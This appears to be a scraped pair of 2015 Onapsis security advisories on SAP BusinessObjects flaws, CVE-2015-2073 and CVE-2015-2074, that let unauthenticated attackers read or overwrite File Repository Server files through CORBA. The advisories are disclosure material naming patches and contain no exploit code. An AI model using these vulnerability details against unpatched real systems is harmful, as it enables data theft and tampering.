iEYEARECAAYFAlTt3yoACgkQz3i6WNVBcDX5EQCfZG26JL1yFGvDoDGEJ+pthDeI TV8AoOEUz36esHb0Ax456UC4JmgFND3O =kgpo -END PGP SIGNATURE-
[Onapsis Security Advisory 2015-002] SAP Business Objects Unauthorized File Repository Server Read via CORBA
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory ONAPSIS-2015-002: SAP Business Objects Unauthorized File Repository Server Read via CORBA 1. Impact on Business = By exploiting this vulnerability a remote unauthenticated attacker would be able to retrieve sensitive business data stored on the remote system. Risk Level: High 2. Advisory Information === - - Public Release Date: 2015-02-25 - - Subscriber Notification Date: 2015-02-25 - - Last Revised: 2015-02-25 - - Security Advisory ID: ONAPSIS-2015-002 - - Onapsis SVS ID: ONAPSIS-00111 - - CVE: CVE-2015-2073 - - Researcher: Will Vandevanter - - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N) 3. Vulnerability Information - - Vendor: SAP - - Affected Components: - BussinessObjects Edge 4.0 (Check SAP Note 2018682 for detailed information on affected releases) - - Vulnerability Class: External Control of File Name or Path (CWE-73) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: No - - Original Advisory: http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-file-repository-server-read-via-corba 4. Affected Components Description == Business Objects is part of the Business Intelligence platform from SAP. It has components that provide performance management, planning, reporting, query and analysis and enterprise information management. Every Business Objects installation provides a web service to interact with different platform services. 5. Vulnerability Details The BusinessObjects File Repositoy Server (FRS) CORBA listener allows a user to read any file stored in the FRS without authentication. The only requirement is that the user know the name of the file in the FRS. For example, Âfrs://Input/a_103/019/000/4967/1b14796c5b0d5f2c.rptÂ. With knowledge of this filename, the user can read the file remotely without authentication. Note, using CORBA it also possible to test if a directory or file exists on the file system. Therefore, although unlikely, an attacker could guess directories and then filenames to brute-force file locations. This would be considerably easier with a predictable file naming convention. 6. Solution === SAP has released SAP Note 2018682 which provides patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/2018682 Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2014-01-16: Onapsis provides vulnerability information to SAP AG. 2014-02-17: SAP confirms having the information of vulnerability. 2014-10-14: SAP releases security patches. 2015-02-25: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis gives organizations the adaptive advantage to succeed in securing business-critical applications by combining technology, research and analytics. Onapsis enables every security and compliance team an adaptive approach to focus on the factors that matter most to their business-critical applications that house vital data and run business processes including SAP Business Suite, SAP HANA and SAP Mobile deployments. Onapsis provides technology solutions including Onapsis X1, the de-facto SAP security auditing tool, and Onapsis Security Platform which delivers enterprise vulnerability, compliance, detection and response capabilities with analytics. The Onapsis Research Labs provide subject matter expertise that combines in-depth knowledge and experience to deliver technical and business-context with sound security judgment. This enables organizations to efficiently uncover security and compliance gaps and prioritize the resolution within applications running on SAP platforms. Onapsis delivers tangible business results including decreased business risk, highlighted compliance gaps, lower operational security costs and demonstrable value on investment. -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: Onapsis Research Team iEYEARECAAYFAlTt3vsACgkQz3i6WNVBcDViHgCguruVbAL1FxUjQlthB5sMx0J6 zqwAnR7jg3BGxzAyhU3ClMSxJEfLQPgx =NrTV -END PGP SIGNATURE-
[Onapsis Security Advisory 2015-003] SAP Business Objects Unauthorized File Repository Server Write via CORBA
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security AdvisoryONAPSIS-2015-003: SAP Business Objects Unauthorized File Repository Server Write via CORBA 1. Impact on Business = By exploiting this vulnerability a remote unauthenticated attacker would be able to overwrite sensitive business data stored on the remote system. Risk Level: High 2. Advisory Information === - - Public Release Date: 2015-02-25 - - Subscriber Notification Date: 2015-02-25 - - Last Revised: 2015-02-25 - - Security Advisory ID: ONAPSIS-2015-003 - - Onapsis SVS ID: ONAPSIS-00109 - - CVE: CVE-2015-2074 - - Researcher: Will Vandevanter - - Initial Base CVSS v2: 6.4 (AV:N/AC:L/AU:N/C:N/I:P/A:P) 3. Vulnerability Information - - Vendor: SAP - - Affected Components: - BussinessObjects Edge 4.0 (Check SAP Note 2018681 for detailed information on affected releases) - - Vulnerability Class: External Control of File Name or Path (CWE-73) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: No - - Original Advisory: http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-file-repository-server-write-via-corba 4. Affected Components Description == Business Objects is part of the Business Intelligence platform from SAP. It has components that provide performance management, planning, reporting, query and analysis and enterprise information management. Every Business Objects installation provides a web service to interact with different platform services. 5. Vulnerability Details The BusinessObjects File Repositoy Server (FRS) CORBA listener allows the writing of any file stored in the FRS without authentication. If the attacker wishes to overwrite a file, the only requirement is that the user know the name of the file in the FRS. For example, âÂÂfrs://Input/a_103/019/000/4967/1b14796c5b0d5f2c.rptâÂÂ. With knowledge of this filename, the user can write the file remotely without authentication. Note, using CORBA it is also possible to test if a directory or file exists on the file system. Therefore, although unlikely, an attacker could guess directories and then filenames brute-forcing files to overwrite. This would be considerably easier with a predictable file naming convention. 6. Solution === SAP has released SAP Note 2018681 which provides patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/2018681 Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline == 2014-01-16: Onapsis provides vulnerability information to SAP AG. 2014-02-17: SAP confirms having the information of vulnerability. 2014-10-14: SAP releases security patches. 2015-02-25: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis gives organizations the adaptive advantage to succeed in securing business-critical applications by combining technology, research and analytics. Onapsis enables every security and compliance team an adaptive approach to focus on the factors that matter most to their business-critical applications that house vital data and run business processes including SAP Business Suite, SAP HANA and SAP Mobile deployments. Onapsis provides technology solutions including Onapsis X1, the de-facto SAP security auditing tool, and Onapsis Security Platform which delivers enterprise vulnerability, compliance, detection and response capabilities with analytics. The Onapsis Research Labs provide subject matter expertise that combines in-depth knowledge and experience to deliver technical and business-context with sound security judgment. This enables organizations to efficiently uncover security and compliance gaps and prioritize the resolution within applications running on SAP platforms. Onapsis delivers tangible business results including decreased business risk, highlighted compliance gaps, lower operational security costs and demonstrable value on investment. -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: Onapsis Research Team iEYEARECAAYFAlTt3w8ACgkQz3i6WNVBcDWRkACffvfY2LtFi4zyVwTpYD1dIABD X8IAoK2UVIGnUiTYzEtfm0F6dAE9xoFR =OK8R -END PGP SIGNATURE-
